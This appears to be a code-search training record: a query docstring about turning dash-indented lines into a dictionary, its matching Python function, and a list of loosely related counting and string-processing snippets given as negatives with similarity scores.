self.assertEqual(self.RNA(\"UACHASADS-\").count_gaps(), 1)\n self.assertEqual(self.RNA(\"---CGAUgCAU---ACGHc---ACGUCAGU---\").count_gaps(), 12)", "def header_len(self):\n if self.num_lines_header is None:\n Nheader = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] == self.header_char) or (\n l == \"\\n\"\n ):\n Nheader += 1\n else:\n break\n\n return Nheader\n else:\n return self.num_lines_header", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def test_line_count(self):\n self.assertEqual(analyze_text(self.filename)[0], 4)", "def length(cont):\r\n\r\n mySum = 0\r\n\r\n if cont == \"\":\r\n return 0\r\n else:\r\n mySum += 1 + length(cont[1:])\r\n return mySum", "def scan_full_pr(fastafile):\n n_full=0\n n=0\n\n with open(fastafile, \"r\") as f:\n lines=f.readlines()\n name=\"\"\n for line_n in lines:\n line=line_n.strip()\n if line[0]==\">\":\n name=line.replace(\">\",\"\")\n n+=1\n else:\n if line[0]==\"M\" and line[-1]==\"*\":\n n_full+=1\n sys.stdout.write(str(name)+\"\\n\")\n\n return n, n_full", "def count(seats: List[str]) -> int:\n # Map dimensions\n m = len(seats)\n n = len(seats[0]) if m else 0\n \n count = 0\n \n # Count locations filled with \"#\"\n for i in range(m):\n for j in range(n):\n if seats[i][j] == \"#\":\n count += 1\n\n return count", "def test_abbcde():\n assert part_01.count_for('abbcde', 2) == 1\n assert part_01.count_for('abbcde', 3) == 0", "def count_segments(s):\n s = s.strip().split()\n return len(s)", "def rp_get_leading_ws(c: Cmdr, lines: Any, tabWidth: Any) -> tuple[list[int], list[str]]:\n # c = self\n indents = [0, 0]\n leading_ws = [\"\", \"\"]\n for i in (0, 1):\n if i < len(lines):\n # Use the original, non-optimized leading whitespace.\n leading_ws[i] = ws = g.get_leading_ws(lines[i])\n indents[i] = g.computeWidth(ws, tabWidth)\n indents[1] = max(indents)\n if len(lines) == 1:\n leading_ws[1] = leading_ws[0]\n return indents, leading_ws", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 132)", "def test_abcccd():\n assert part_01.count_for('abcccd', 2) == 0\n assert part_01.count_for('abcccd', 3) == 1", "def word_count(self):\n print(self.words())\n return len(self.words())\n #count = 0\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # count += len(wordslst)\n #return count\n #joined_string = ''.join(self.lines)\n #for word in joined_string:\n # if word != ' ' and word != '\\n' and word != '\\t':\n # count += 1\n #print('READ ME ––––––––––', self.lines)\n #print(joined_string)\n #print(line)\n #print(wordslst)\n #print(count)", "def custom_count(string1, search_string):\n count = 0\n for index in range(0, len(string1)):\n phrase = string1[index:index + len(search_string)]\n count += (phrase == search_string)\n return count", "def skipWhite(self):\n logging.debug('Skipping whitespace')\n while (self.__current_pos < len(self.__string) and self.__string[self.__current_pos].isspace()):\n if self.__string[self.__current_pos] == '\\n': # TODO handle \\r and \\r\\n correctly, get position in the line correctly\n self.line += 1\n self.linePos = 0\n if self.__string[self.__current_pos] == '\\r' and self.__current_pos + 1 < len(self.__string) and self.__string[self.__current_pos + 1] != '\\n':\n print (\"counted r\")\n self.line += 1\n self.linePos = 0\n self.__current_pos += 1\n self.linePos += 1", "def sticky_count(st):\n fwd_str = st.strip(\" \")\n return sticky_count_wrapper(fwd_str=fwd_str)", "def wc(filename):\n\n\n # holds number of characters, words and lines in the file\n lines = 0\n words = 0\n char = 0\n try: # if the file does not exist\n file = open(filename)\n for line in file: # goes through file\n lines += 1\n wordList = line.split()\n words += len(wordList)\n for el in wordList: # this way I only count characters without \" \"(spaces)\n char += len(el)\n file.close()\n except Exception as e:\n print(e)\n lines, words, char = 404, 404, 404\n\n # prints out only if there was a right file name\n print(f\"{lines} {words} {char} {filename}\")", "def compute_nbtab(line):\n nb = 0\n for l in line:\n if l == '\\t':\n nb = nb + 1\n else:\n break\n return nb", "def found_needed_docstr(self):\n self.needed += 1\n self.found += 1", "def gapRunCount(letters):\n uniqLetters = map(operator.itemgetter(0), groupby(letters))\n return uniqLetters.count(\"-\")", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def len_link(s):\n length = 0\n while s != empty:\n s, length = rest(s), length + 1\n return length", "def check_prefix(custom_str: str) -> bool:\r\n\r\n return len(custom_str) == 0", "def minpart1(data: str = open(DIR+\"input.txt\", \"r\").read()) -> int:\n lines: List[str] = data.split(\"\\n\")\n sets: List[Set[str]] = list(map(lambda a: set(), range(len(lines[0]) + 1)))\n for i in range(ord(\"a\"), ord(\"z\") + 1):\n for line in lines:\n sets[len(re.findall(f\"{chr(i)}\", line))].add(line)\n return len(sets[2]) * len(sets[3])", "def check(string):\n if string[4]==\" \" and string[9]==\" \" and string[14]==\" \":\n add = 0\n count = 0\n for i in string:\n if 48<=ord(i)<= 57 or ord(i)==32:\n if 48 <= ord(i)<=57:\n add+=int(i)\n count+=1\n print(add,count)\n #return bool(count == 16)", "def count(word):\n\n return len(word)", "def countissue(s): \r\n if s:#check if Nonetype.\r\n if s=='None':\r\n #if type(s)==str or type(s)==float:#Handle \r\n return 0\r\n else:\r\n return len(s)\r\n else:#if empty\r\n return 0", "def _remove_beginning_newlines(lines):\n first_non_blank_line = 0\n\n for line in lines:\n if line.strip():\n break\n\n first_non_blank_line += 1\n\n return lines[first_non_blank_line:]", "def count_less(count, a):\n if len(a[0]) < len(a[1]):\n return count + 1\n return count", "def get_indent(line):\n if is_blank(line):\n return 0\n\n stripped = line.lstrip(' ')\n if stripped.startswith('- '):\n stripped = stripped[2:].lstrip(' ')\n # This is a list item\n\n return len(line) - len(stripped)", "def count_word(doc):\n count = count = 0\n for w in document.split(\" \"):\n count = count + 1\n return count", "def _get_num_syllables(doc: Doc, min_syllables: int = 1):\n text = (word for word in doc if not word.is_punct and \"'\" not in word.text)\n syllables_per_word = tuple(syllapy.count(word.text) for word in text)\n return sum(c for c in syllables_per_word if c >= min_syllables)", "def repeatedString(s, n):\n\n count = 0\n s_count_a = s.count('a')\n\n count += math.floor(n / len(s)) * s_count_a\n for _ in range(n % len(s)):\n if s[_] == 'a':\n count += 1\n\n return count", "def test_match_start_check_at_beginning_of_string(self):\n first_letter = \"a\"\n s = \"abcdef\"\n self.assertEqual(__, re.search(first_letter, s).group())", "def line_count(fname):\n return int(call(['wc', '-l', fname]).strip().split()[0])", "def _remaining_str_len(self, s: str) -> int:\r\n total_remaining_chars = len(s) # includes color/repeater specifiers\r\n\r\n specifiers_used = ''.join(self._color_or_repeater_regexp.findall(s))\r\n # length of specifier strings used\r\n specifier_chars_len = len(specifiers_used)\r\n\r\n return total_remaining_chars - specifier_chars_len", "def part1(data: str = None) -> int:\n polymer: str = getpolymer(data)\n return len(react(polymer))", "def countCharacters(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_chars = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_chars += len(line)\r\n\r\n return counter_chars", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 970)", "def test_discard_first(self):\n test_length = random.randint(0,100)\n test_string = \"#\\t{0}\".format(\"\\t\".join(map(str, xrange(test_length))))\n expected = test_length\n computed = len(self.parser.parse_header(test_string, extract_mock))\n self.assertEquals(expected, computed)", "def len_link_recursive(s):\n if s == empty:\n return 0\n return 1 + len_link_recursive(rest(s))", "def test_before_space():\n \n \n assert(1 == before_space(\"1 2 3\"))\n assert(\"NO SPACE\" == before_space(\"1\"))\n assert(\"Error\" == before_space(None))", "def count_semi_colons(txt):\n \n count = 0\n for c in txt:\n if c == ';':\n count += 1\n return count" ]
[ "0.6599933", "0.62831575", "0.62317944", "0.6203771", "0.6051275", "0.6027196", "0.599927", "0.5920738", "0.5860832", "0.5799355", "0.57977337", "0.57650226", "0.57611704", "0.57336843", "0.5714815", "0.5706141", "0.56840324", "0.5660799", "0.5651189", "0.5635546", "0.562362", "0.5612918", "0.5611543", "0.55728394", "0.5554686", "0.5538484", "0.551748", "0.55116844", "0.550551", "0.5481684", "0.5467182", "0.5457952", "0.5453982", "0.5447541", "0.5443042", "0.54361975", "0.5419882", "0.5418461", "0.54027873", "0.5394906", "0.53861624", "0.5383084", "0.53704125", "0.53497404", "0.53464967", "0.53406775", "0.53343564", "0.53261614", "0.53118515", "0.52961475", "0.5288309", "0.52842265", "0.5282063", "0.52791595", "0.5274662", "0.5266758", "0.5256109", "0.5250987", "0.5250987", "0.5240101", "0.5233277", "0.5231969", "0.52311456", "0.5226617", "0.52191216", "0.5216864", "0.52151066", "0.5212979", "0.5212222", "0.52103317", "0.5207186", "0.5205395", "0.5203507", "0.5186418", "0.5175645", "0.5169054", "0.5169054", "0.5169054", "0.5169054", "0.51680166", "0.5165108", "0.51634294", "0.51607394", "0.51585835", "0.5157562", "0.5152983", "0.51453626", "0.5139905", "0.51388896", "0.5137367", "0.5135156", "0.5133846", "0.5129005", "0.5125214", "0.51225996", "0.5121434", "0.5110038", "0.51021594", "0.5100197", "0.5097363" ]
0.62299573
3
Structurize the list of lines into a dict by counting the leading ""s > as values. We also get rid of the "" and whitespaces afterwards!
def structure(data: list) -> dict: structure = {} for i in range(0, len(data)): leading_ = Interpreter.leading(Interpreter(), data[i]) data_ele = data[i].replace("-", "").strip() if data_ele in structure: structure[data_ele + "%%%"] = leading_ structure[data_ele] = leading_ return structure
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def dictFromLines(lines,sep=None):\n reComment = re.compile('#.*')\n temp = [reComment.sub('',x).strip() for x in lines.split('\\n')]\n if sep == None or type(sep) == type(''):\n temp = dict([x.split(sep,1) for x in temp if x])\n else: #--Assume re object.\n temp = dict([sep.split(x,1) for x in temp if x])\n return temp", "def parse_lines_to_dict(lines):\n res = {k: v.strip() for k, v in (m.split(':', 1) for m in lines)}\n return res", "def parse_file(input_lst):\n word_dct = {}\n for line in input_lst:\n raw_output = line.split() # these are lists of strings\n for str_ in raw_output: # strings\n str_ = str_.lower()\n str_ = str_.replace(\"-\", \" \")\n str_ = str_.replace(\"?\", \"\")\n str_ = str_.replace(\"!\", \"\")\n str_ = str_.replace(\",\", \"\")\n str_ = str_.replace(\"\\'\", \"\")\n str_ = str_.replace('\\\"', \"\")\n str_ = str_.replace(\".\", \"\")\n if str_ not in word_dct:\n word_dct[str_] = 1\n else:\n word_dct[str_] += 1\n return word_dct", "def fields_to_dict(lines, delim='\\t', strip_f=strip):\r\n result = {}\r\n for line in lines:\r\n # skip empty lines\r\n if strip_f:\r\n fields = map(strip_f, line.split(delim))\r\n else:\r\n fields = line.split(delim)\r\n if not fields[0]: # empty string in first field implies problem\r\n continue\r\n result[fields[0]] = fields[1:]\r\n return result", "def _handle_dict(string):\n dict_lines = [line.split(Parser.FIELD_DELIM) for line in string.split(Parser.LINE_DELIM)\n if Parser.FIELD_DELIM in line]\n cur_dict = 0\n results = [{}]\n for line in dict_lines:\n if line[0] in results[cur_dict]:\n results.append({})\n cur_dict += 1\n results[cur_dict][line[0]] = line[1]\n return results", "def export_commentary_text_as_dictionary(commentary_parts_list):\n verse_string = str(commentary_parts_list[0])\n header_string = str(commentary_parts_list[1])\n \n verse = re.search(r\"\\[(\\d+)\\]\", verse_string).group(1)\n header = re.search(r'\\<u\\>\\s*\"(.+)\"\\s*\\<\\/u\\>', header_string).group(1)\n\n commentary_text = commentary_parts_list[2].replace(\": \", \"\")\n key = verse + \"__\" + header\n \n return key, commentary_text.strip()", "def clean_data(self, lines):\n\n data = []\n curr = None\n for line in lines:\n line = self.clean_line(line)\n\n temp = []\n quotes = 0\n for item in line.split():\n if quotes % 2 == 0:\n temp.append(item)\n else:\n temp[-1] += item\n quotes += item.count(\"\\\"\")\n line = temp\n\n if not line:\n continue\n if curr:\n if self.compare_keys(curr, line):\n curr = self.merge_lines(curr, line)\n else:\n data.append(self.add_line(curr))\n curr = line\n else:\n curr = line\n if curr:\n data.append(self.add_line(curr))\n return data", "def process(raw):\n entry = { }\n cooked = [ ]\n\n for line in raw:\n line = line.strip()\n if len(line) == 0 or line[0]==\"#\" :\n continue\n parts = line.split(';')\n if len(parts) == 3:\n entry[\"description\"] = parts[0].strip() #adding key and values to the dict\n entry[\"long\"] = parts[1].strip()\n entry[\"lat\"] = parts[2].strip()\n cooked.append(entry) #add this dict entry into the array\n entry = { }\n continue\n else:\n raise ValueError(\"Trouble wiht line: '{}'\\n\".format(line))\n \n return cooked #returning an array of dicts", "def get_dict(fname):\n out_set, tot_count = {}, 0\n with open(fname, 'r') as fid:\n word_arr = fid.read().split('\\n')\n for ele in word_arr:\n if len(ele) > 0:\n out_set[(ele.split()[0])] = tot_count\n tot_count += 1\n return out_set", "def _split_raw_file(raw_file: str) -> dict:\r\n input_file = raw_file.split(\"\\n\")\r\n\r\n line_count = 0\r\n statements = {}\r\n while line_count < len(input_file):\r\n line = input_file[line_count]\r\n if len(line) == 0:\r\n line_count += 1\r\n continue\r\n else:\r\n key = line\r\n value = input_file[line_count + 1]\r\n statements.update({key: value})\r\n line_count += 2\r\n return statements", "def counterdict(self):\n vas = []\n file = self.read1()\n for line in file:\n line = line.strip()\n string = re.sub(\"[^0-9a-zA-Z]\", \" \", line).split(\" \")\n for s_i in string:\n if s_i != \"\":\n vas.append(s_i)\n for ele in enumerate(vas):\n print(ele)\n logging.debug(\"Starting with to\")", "def makeDict(self, s):\n out = {}\n entries = s.split(self.dataDelimiterEntry)\n for e in entries:\n if e == \"\":\n continue\n c = e.split(self.dataDelimiterKey)\n out[c[0]] = c[1]\n return out", "def split(self, line):\n parts = line.split()\n return {\n 'size': 0 if parts[9] == '-' else int(parts[9]), \n 'file_requested': parts[6]\n }", "def _parse(file_contents):\n\n if file_contents is None or file_contents == '':\n return {}\n\n result = {}\n\n for line in file_contents.splitlines():\n # Full line comment\n if line[:1] == '#':\n continue\n\n parts = line.split('=', 1)\n\n # Not a full key-value pair.\n if len(parts) < 2:\n continue\n\n result[parts[0].strip()] = parts[1].strip()\n\n return result", "def parse_entry(lines):\n entry = {}\n for line in lines:\n line = line.replace('\\n', '').replace('\\r', '')\n if ':: ' in line:\n (key, value) = line.split(':: ')\n value = base64.b64decode(value).decode('utf-8')\n elif ': ' in line:\n (key, value) = line.split(': ')\n else:\n continue\n if key not in entry:\n entry[key] = []\n entry[key].append(value)\n return entry", "def _raw_misc_to_dict(raw):\n ret = {}\n for elem in raw:\n key, _, val = elem.partition(',')\n key = key.lstrip(\"(\").strip()\n val = val[:-1].strip()\n ret[key] = val\n return ret", "def __analyze_config(self):\n result = {}\n with open(self.file) as f:\n data = f.readlines()\n temp_key = ''\n for line in data:\n if line[0] == '\t' or line[0] == ';':\n result[temp_key].append(line.strip())\n else:\n temp_key = line.strip()\n result[temp_key] = []\n return result", "def configDict(config):\n config_dict = {}\n line_number = 0\n if type(config) == str:\n config_object = config.splitlines()\n else:\n return \"ERROR: config not type str\"\n for index, line in enumerate(config_object):\n if not bool(re.match(\"^\\s|!\", line)):\n line_number = index\n config_dict[line] = []\n elif bool(re.match(\"^\\s\", line)):\n config_dict[config_object[line_number]].append(line.strip())\n return config_dict", "def make_histogram(s):\n hist = {}\n for x in s:\n if x is '\\n':\n pass\n else:\n hist[x] = hist.get(x, 0) + 1\n return hist", "def create_dicts(self, path):\n line_d = {}\n rel_d = {}\n\n with open(path) as f:\n for line in islice(f, 0, None, 4):\n lister = line.split('\"')\n line_number = int(lister[0].split('\\t')[0])\n line_d[line_number] = ''.join(str(s) for s in lister[1:])\n \n with open(path) as f:\n for i, line in enumerate(islice(f, 1, None, 4)):\n rel_d[i] = line.split('\\n')[0]\n \n return (line_d, rel_d)", "def ParseWorkload(contents):\n fp = io.StringIO(contents)\n result = {}\n for line in fp:\n if (\n line.strip()\n and not line.lstrip().startswith('#')\n and not line.lstrip().startswith('!')\n ):\n k, v = re.split(r'\\s*[:=]\\s*', line, maxsplit=1)\n result[k] = v.strip()\n return result", "def create_dicts(path):\n line_d = {}\n rel_d = {}\n\n with open(path) as f:\n for line in islice(f, 0, None, 4):\n lister = line.split('\"')\n line_number = int(lister[0].split('\\t')[0])\n line_d[line_number] = ''.join(str(s) for s in lister[1:])\n \n with open(path) as f:\n for i, line in enumerate(islice(f, 1, None, 4)):\n rel_d[i] = line.split('\\n')[0]\n \n return (line_d, rel_d)", "def _convert_tags_to_dict(text_list_tags):\n return OrderedDict([re.findall(r\"\"\"\\s*_(\\w+)\\s+(.+?)\\s*$\"\"\", row)[0] for row in text_list_tags])", "def qsl():\n new_line = temp.splitlines()\n qs_line = []\n reltype = []\n for i in range(len(new_line)):\n if \"QSLINK\" in new_line[i]:\n qs_line.append(new_line[i].split('\" '))\n for i in range(len(qs_line)):\n reltype.append(qs_line[i][5].split('=\"')[1])\n setList = list(set(reltype))\n my_dict = {i: reltype.count(i) for i in setList}\n print(my_dict)", "def build_dict(fname):\n\t\n\twith open(fname) as file:\n\n\t\tword_count_dict = {}\n\n\t\tfor line in file:\n\t\t\tline = line.rstrip()\n\t\t\tline =line.split(' ')\n\t\t\tfor word in line:\n\t\t\t\tword = word.strip('\"!.,?_;():')\n\t\t\t\tword = word.lower()\n\t\t\t\tword_count_dict[word] = word_count_dict.get(word, 0) + 1\n\t\t#return word_count_dict\n\n\t\tfor each in word_count_dict:\n\t\t\tcount = word_count_dict[each]\n\t\t\tprint(each, count)\n\n\t\treturn", "def pgn2dict(txt):\n result = {}\n for line in txt:\n if not line:\n continue\n match = re.search(r'(\\w+) \"(.*)\"', line).groups()\n result[match[0]] = match[1].replace(\"'\", \"''\")\n\n return result", "def create_names_dict(infile):\n return [name.strip(\"\\n\") for name in open(infile, \"r\")]", "def parse_output(output):\n lines = output.splitlines()[3:-1]\n r = {}\n for line in lines:\n kv = filter(None, line.split('|'))\n kv = [x.strip() for x in kv]\n r.update({kv[0]: kv[1]})\n return r", "def parse_to_dicts(lines, containers):\n\n pairs = [(a, b.strip()) for a, b in (m.split(':', 1) for m in lines)]\n item = {}\n kind, name = None, None\n for j in range(0, len(pairs)):\n if pairs[j][0] in containers.keys():\n if j != 0:\n containers[kind].append((name, item))\n item = {}\n kind = pairs[j][0]\n name = pairs[j][1]\n else:\n item[pairs[j][0]] = pairs[j][1]\n if kind is not None:\n containers[kind].append((name, item))\n\n return containers", "def inf2dict(text):\n lines = text.strip().split('\\n')\n pairs, extra_lines = split_lines(lines)\n return parse_pairs(pairs, extra_lines)", "def to_dictionary(file):\n\n\tfin = open(file)\n\td = dict()\n\n\tfor line in fin:\n\t\td[line.strip()] = ''\n\treturn d", "def prepare_looped_lines(self, alldict, comblist):\n loopline_dict=dict()\n for stridx in comblist:\n lidx = int(stridx.split('-')[0])\n loopidx = int(stridx.split('-')[1])\n loopline_dict[lidx] = alldict[lidx]['prepend'] + alldict[lidx]['looplist'][loopidx].strip() + alldict[lidx]['append'] + '\\n'\n return loopline_dict", "def parse(line):\n return dict([pair.split(':') for pair in line.split()])", "def builddictionary(dirlist):\n init_dictionary={}\n for string in dirlist:\n splitstring=string.split(\"\\t\")\n if len(splitstring) == 2:\n init_dictionary[splitstring[1].strip(\"\\n\")] = [int(splitstring[0]), 0]\n return init_dictionary", "def prepare_data(data: list) -> dict:\n d = {}\n for t in data:\n d[t[0]] = read_text(t[1])\n return d", "def get_contents(path : str) -> dict[str, dict[str, int]]:\n with open(path, \"r\") as f:\n lines = f.readlines();\n \n contents = {}\n\n # Could use regex here, but hardly seems necessary due to the input size.\n for line in lines:\n try:\n bag, contains = line.split(\" bags contain \");\n except:\n continue\n\n contents[bag] = Counter()\n if contains.startswith(\"no\"): continue\n\n # separate types\n for item in contains.split(\", \"):\n parts = item.split();\n color = parts[1] + \" \" + parts[2]\n count = int(parts[0])\n contents[bag][color] = count\n \n return contents", "def _parse_long(value):\n dict_value = {}\n\n for line in value.split('\\n'):\n if ':' in line:\n k, v = line.split(':', 1)\n dict_value[k.strip()] = v.strip()\n\n return dict_value", "def parse_branches(branch_list):\n return dict(x.lstrip('# ').split(maxsplit=1) for x in branch_list)", "def parse_listings(listings_raw):\n listings = {}\n for alist in listings_raw:\n name_key = parse_key_string(alist)\n if ignore_listings(name_key):\n continue\n if name_key not in listings:\n listings[name_key] = []\n listings[name_key].append(alist)\n with open('listings.modified.txt', 'w') as file_:\n file_.write(json.dumps(listings, sort_keys=True, indent=2))\n length_listings(listings)\n return listings", "def _parse_handle_section(lines):\n data = {}\n key = ''\n next(lines)\n\n for line in lines:\n line = line.rstrip()\n if line.startswith('\\t\\t'):\n if isinstance(data[key], list):\n data[key].append(line.lstrip())\n elif line.startswith('\\t'):\n key, value = [i.strip() for i in line.lstrip().split(':', 1)]\n key = normalize(key)\n if value:\n data[key] = value\n else:\n data[key] = []\n else:\n break\n\n return data", "def potcar_str2dict(potcar_list: Optional[str]) -> dict:\n if potcar_list is None:\n return {}\n elif isinstance(potcar_list, str):\n potcar_list = potcar_list.split()\\\n\n d = {}\n for p in potcar_list:\n element = p.split(\"_\")[0]\n d[element] = p\n return d", "def __line_parse(index: int, line: list, dictionary: dict, word_list: list):\n\n if index + 2 >= len(line):\n return\n word_1 = line[index + 2]\n word_2 = line[index + 1]\n word_3 = line[index]\n if word_1 == \"\" or word_2 == \"\" or word_3 == \"\":\n return\n\n if word_1 not in dictionary:\n dictionary[word_1] = {\n str(word_1 + \"_1\"): {\n\n },\n str(word_1 + \"_2\"): {\n\n },\n str(word_1 + \"_3\"): {\n\n }\n }\n if word_2 not in dictionary:\n dictionary[word_2] = {\n str(word_2 + \"_1\"): {\n\n },\n str(word_2 + \"_2\"): {\n\n },\n str(word_2 + \"_3\"): {\n\n }\n }\n if word_3 not in dictionary:\n dictionary[word_3] = {\n str(word_3 + \"_1\"): {\n\n },\n str(word_3 + \"_2\"): {\n\n },\n str(word_3 + \"_3\"): {\n\n }\n }\n if word_1 not in word_list:\n word_list.append(word_1)\n if word_2 not in word_list:\n word_list.append(word_2)\n if word_3 not in word_list:\n word_list.append(word_3)\n \"\"\" word_3 word_2 word_1\"\"\"\n if word_2 not in dictionary[word_1][str(word_1 + \"_1\")]:\n dictionary[word_1][str(word_1 + \"_1\")][word_2] = 1\n else:\n dictionary[word_1][str(word_1 + \"_1\")][word_2] = dictionary[word_1][str(word_1 + \"_1\")][word_2] + 1\n if word_3 not in dictionary[word_1][str(word_1 + \"_2\")]:\n dictionary[word_1][str(word_1 + \"_2\")][word_3] = 1\n else:\n dictionary[word_1][str(word_1 + \"_2\")][word_3] = dictionary[word_1][str(word_1 + \"_2\")][word_3] + 1\n if word_3 not in dictionary[word_2][str(word_2 + \"_1\")]:\n dictionary[word_2][str(word_2 + \"_1\")][word_3] = 1\n else:\n dictionary[word_2][str(word_2 + \"_1\")][word_3] = dictionary[word_2][str(word_2 + \"_1\")][word_3] + 1\n if index + 3 >= len(line) or line[index + 3] == \"\":\n return\n word_0 = line[index + 3]\n if word_0 not in dictionary:\n dictionary[word_0] = {\n str(word_0 + \"_1\"): {\n\n },\n str(word_0 + \"_2\"): {\n\n },\n str(word_0 + \"_3\"): {\n\n }\n }\n\n if word_0 not in word_list:\n word_list.append(word_0)\n\n if word_3 not in dictionary[word_0][str(word_0 + \"_3\")]:\n dictionary[word_0][str(word_0 + \"_3\")][word_3] = 1\n else:\n dictionary[word_0][str(word_0 + \"_3\")][word_3] = dictionary[word_0][str(word_0 + \"_3\")][word_3] + 1", "def dict_make():\n f = open('words.txt','r')\n dict1 = f.read().splitlines()\n return filter(lambda z:len(z) >= 4, dict1)", "def makeGcauCfgDictFromAgc(lineList): \r\n diction = {}\r\n withinCfgData = False\r\n for eachString in lineList:\r\n if re.match(RE_COMPILED_CFG_START, eachString):\r\n withinCfgData = True\r\n elif re.match(RE_COMPILED_CFG_END, eachString):\r\n withinCfgData = False\r\n elif withinCfgData:\r\n p = re.match(RE_COMPILED_CFG_ITEM, eachString)\r\n if p:\r\n obj = p.groups()[0]\r\n attr = p.groups()[1]\r\n val = p.groups()[2]\r\n if obj not in diction:\r\n diction[obj] = {}\r\n diction[obj][attr] = val\r\n return diction", "def createDict(self):\n data = d.Dictionary.dictionary\n while True:\n filtered = [line.strip() for line in data if len(line) == self.wordLen]\n if len(filtered) == 0:\n self.setNewLen()\n else:\n break\n return filtered", "def parse_file(text):\n tmp = list(map(lambda x: x.replace('\\n', ''), text.split(';')))\n output = {}\n for item in tmp:\n if not '=' in item:\n continue\n firstequal = item.find('=')\n identifier = item[:firstequal].strip()\n obj = item[firstequal + 1:].strip()\n output[identifier] = obj\n return output", "def read_desc(fname):\n dict_ = {}\n with open(fname, 'r') as handle:\n for i, line in enumerate(handle):\n list_ = shlex.split(line)\n if 7 <= i < 10:\n if list_[0] in ['All', 'Treated', 'Untreated']:\n dict_[list_[0]] = {}\n dict_[list_[0]]['Number'] = list_[1:]\n elif 20 <= i < 23:\n print(list_)\n if list_[0] == 'Observed':\n dict_['All'][list_[0] + ' ' + list_[1]] = list_[2:]\n else:\n dict_['All'][list_[0] + ' ' + list_[1] + ' ' + list_[2]] = list_[3:]\n elif 29 <= i < 32:\n if list_[0] == 'Observed':\n dict_['Treated'][list_[0] + ' ' + list_[1]] = list_[2:]\n else:\n dict_['Treated'][list_[0] + ' ' + list_[1] + ' ' + list_[2]] = list_[3:]\n elif 38 <= i < 41:\n if list_[0] == 'Observed':\n dict_['Untreated'][list_[0] + ' ' + list_[1]] = list_[2:]\n else:\n dict_['Untreated'][list_[0] + ' ' + list_[1] + ' ' + list_[2]] = list_[3:]\n\n return dict_", "def process_entries(entries):\n data = {}\n for e in entries:\n e = e.strip()\n if e and not e.startswith('#') and not e.startswith('-e'):\n project, version = e.split('==')\n if not version:\n raise ValueError(\"Unexpected syntax '{0}'\".format(e))\n data[project] = version\n return data", "def postprocess_ini_section_items(items: Union[Mapping, Iterable]) -> Generator:\n splitter_re = re.compile('[\\n\\r\\t]+')\n if isinstance(items, Mapping):\n items = items.items()\n for k, v in items:\n if v.startswith('\\n'):\n v = splitter_re.split(v[1:])\n v = [vv.strip() for vv in v if vv.strip()]\n v = [vv for vv in v if not vv.startswith('#')] # remove commented lines\n yield k, v", "def parse_perf_stat_output(perf_stat_output: str, perf_counters: List[str]):\n counters_dict = {}\n for line in perf_stat_output.split('\\n'):\n for perf_counter in perf_counters:\n if perf_counter in line:\n count_string = re.findall(r'^\\s*\\d*', line)[0].replace(' ', '')\n count = int(count_string)\n counters_dict[perf_counter] = count\n return counters_dict", "def create_dict(fd):\n # initialize an empty dictionary\n full_dict = {}\n # loop through file\n for line in fd:\n # lowercase everything in line, then split line into a list\n line = line.lower().split()\n # loop through elements in the list of words in the splitted line\n for word in line:\n # strip words from puncuation using string module\n word = word.strip(string.punctuation)\n # if words contains only alphabatic characters and of length > 1\n if word.isalpha() and len(word)!= 1:\n if len(word) in full_dict:\n full_dict[len(word)].add(word)\n else:\n full_dict[len(word)] = set()\n full_dict[len(word)].add(word)\n return full_dict", "def _parse_metadata_fields(key_value_block: str) -> Dict[str, str]:\n key_value_block = key_value_block.lstrip()\n field_lines = re.split(r'\\n', key_value_block)\n field_name = 'unknown'\n fields_builder: Dict[str, str] = {}\n for field_line in field_lines:\n field_match = RE_FIELD_COMPONENTS.match(field_line)\n if field_match and field_match.group('field') in NAMED_FIELDS:\n field_name = field_match.group(\n 'field').lower().replace('-', '_')\n field_name = re.sub(r'_no$', '_num', field_name)\n fields_builder[field_name] = field_match.group(\n 'value').rstrip()\n elif field_name != 'unknown':\n # we have a line with leading spaces\n fields_builder[field_name] += re.sub(r'^\\s+', ' ', field_line)\n return fields_builder", "def read_transfile(lines: List[str], strip_punc=True, weighted=False, lowercase=True, length=0) -> Dict[str, Dict[str, float]]:\n data = OrderedDict()\n first = True\n options = {}\n key = \"\"\n keylen = 0\n for line in lines:\n if lowercase:\n line = line.strip().lower()\n else:\n line = line.strip()\n # in a group, the first one is the KEY. \n # all others are part of the set. \n if len(line) == 0:\n first = True\n if len(key) > 0 and len(options) > 0:\n if key in data:\n print(f\"Warning: duplicate sentence! {key}\")\n if length == 0 or length == keylen:\n data[key] = options\n options= {}\n else:\n if first:\n key, prompt = line.strip().split(FIELDSEP)\n keylen = len(prompt.split())\n first = False\n else:\n # allow that a line may have a number at the end specifying the weight that this element should take. \n # this is controlled by the weighted argument.\n # gold is REQUIRED to have this weight.\n if FIELDSEP in line:\n text, weight = line.strip().split(FIELDSEP)\n else:\n text = line.strip()\n weight = 1\n\n if strip_punc:\n text = remove_punctuation(text)\n\n options[text] = float(weight)\n\n # check if there is still an element at the end.\n if len(options) > 0 and (length == 0 or length == keylen):\n data[key] = options\n\n return data", "def create_dict_from_file(filename, delimeters, first_char, column_names):\n\n # This opens the\n measurement_output = open('measurement_output.txt', \"w\", encoding=\"utf8\")\n # This creates and initializes a list to serve as a dictionary container outside of the for-loop.\n measurements_file_container = {}\n\n # This opens the file and then splits it (preserving the commas because of the landfall count requirement).\n if not filename.endswith('.txt'):\n print('Input File Must Be a .txt File')\n return None\n elif delimeters != '{}=|{}=|{}='.format(column_names[0], column_names[1], column_names[2]):\n print('Please Check Syntax for Delimeters and colunm_names.')\n return None\n else:\n with open(filename, 'r') as infile:\n for line in infile:\n line = line.strip()\n # This checks to see if line begins with a numeric character; if so, it is a header for a new measurement.\n if line[0].isnumeric():\n measurement_current_line = line.split()\n # This initializes a new measurement dictionary with the 3 items in column_names\n key = measurement_current_line[0]\n new_measurement_dictionary = {\n column_names[0]: '0',\n column_names[1]: '0',\n 